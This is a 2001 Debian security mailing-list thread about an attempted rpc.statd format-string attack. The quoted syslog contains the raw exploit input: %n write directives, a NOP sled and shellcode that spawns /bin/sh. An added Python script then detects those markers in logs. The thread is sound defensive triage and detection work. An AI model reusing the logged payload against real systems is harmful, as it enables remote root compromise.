Re: was I cracked? (rpc.statd, new version)
Thanks for this explanation. I got hit with the exact same
exploit this evening. I compared my entire /etc structure to
a known good one from almost a month ago and everything checks
out. I'm taking your advice and shutting down this service
when not using it until I can secure it properly.
thanks,
jc
Thusly Thwacked By Jeremy Gaddis:
> Someone attempted to run the rpc.statd buffer overflow on
> you, but it appears to have failed. The reason you see
> "/bin/sh" in the log entry is because that's part of the
> shellcode of the exploit. The exploit, when successful,
> executes /bin/sh on your machine and leaves the attacker
> sitting at a root shell prompt.
>
> As someone else stated, disable the rpc.* services if you
> don't need them. If you do, they should be firewalled off
> and only accept packets from machines they need to "converse"
> with.
>
> j.
>
> --
> Jeremy L. Gaddis <jlgaddis@blueriver.net>
>
> -----Original Message-----
> From: Lukas Eppler [mailto:lukas.eppler@tempobrain.com]
> Sent: Wednesday, July 11, 2001 5:42 AM
> To: debian-security@lists.debian.org
> Subject: was I cracked? (rpc.statd, new version)
>
>
> I have the following entries in /var/log/messages:
>
> Jul 9 01:21:03 blue -- MARK --
> Jul 9 01:21:11 blue
> Jul 9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z
> <F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x
> %n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220
> Jul 9 01:21:11 blue
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>
> \200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul 9 01:41:03 blue -- MARK --
>
> I run Debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known exploit fixed. I can't find modified binaries or any strange
> behaviour... was this a defeated attack? The second line says /bin/sh
> somewhere which makes me a bit concerned... Was I cracked?
>
> Lukas
>
--
Jeff Coppock Nortel Networks
Systems Engineer http://nortelnetworks.com
Major Accts. Santa Clara, CA
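A defender-side check for log entries like the ones Lukas quoted, as an added example and not code from anyone in this thread: it scans syslog lines for the three markers visible in the quoted log (the %n format directives, the long run of \220, i.e. 0x90 NOP bytes, and the /bin/sh string embedded in the shellcode) and reports which lines carry them. The sample lines are constructed and shortened, and the regexes are assumptions about how syslog renders those bytes.

```python
import re

# Constructed sample, modelled on the entries quoted in the thread; the real
# NOP sled ran to hundreds of bytes and a benign lookup failure is added for
# contrast.
SAMPLE_LOG = r"""Jul 9 01:21:03 blue -- MARK --
Jul 9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for ^X<F7><FF><BF>%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220
Jul 9 01:21:11 blue <C7>^F/bin<C7>F^D/shA0<C0>\210F^G
Jul 9 01:41:03 blue -- MARK --
Jul 9 02:00:00 blue /sbin/rpc.statd[166]: gethostbyname error for nosuchhost.example
"""

# Indicators (assumed syslog rendering): %n directives are what a format-string
# attack uses to write memory; syslog prints byte 0x90 as \220, so a run of them
# is a NOP sled; "/bin/sh" may be split by shellcode bytes, e.g. /bin<C7>F^D/sh.
WRITE_DIRECTIVE = re.compile(r"%\d*n")
NOP_SLED = re.compile(r"(?:\\220){8,}")
SHELL_STRING = re.compile(r"/bin\S{0,8}/sh")


def scan_line(line):
    """Return the list of attack indicators found in one syslog line."""
    hits = []
    if WRITE_DIRECTIVE.search(line):
        hits.append("format-string %n write directive")
    if NOP_SLED.search(line):
        hits.append("NOP sled (run of 0x90 bytes)")
    if SHELL_STRING.search(line):
        hits.append("/bin/sh string from shellcode")
    return hits


def scan_log(text):
    """Return [(line_number, line, hits)] for every line carrying an indicator.

    A hit shows an attempt was made, not that it succeeded; a plain
    gethostbyname failure for a real hostname produces no hit.
    """
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((number, line, hits))
    return findings


if __name__ == "__main__":
    for number, line, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
        print(f"    {line[:70]}")
```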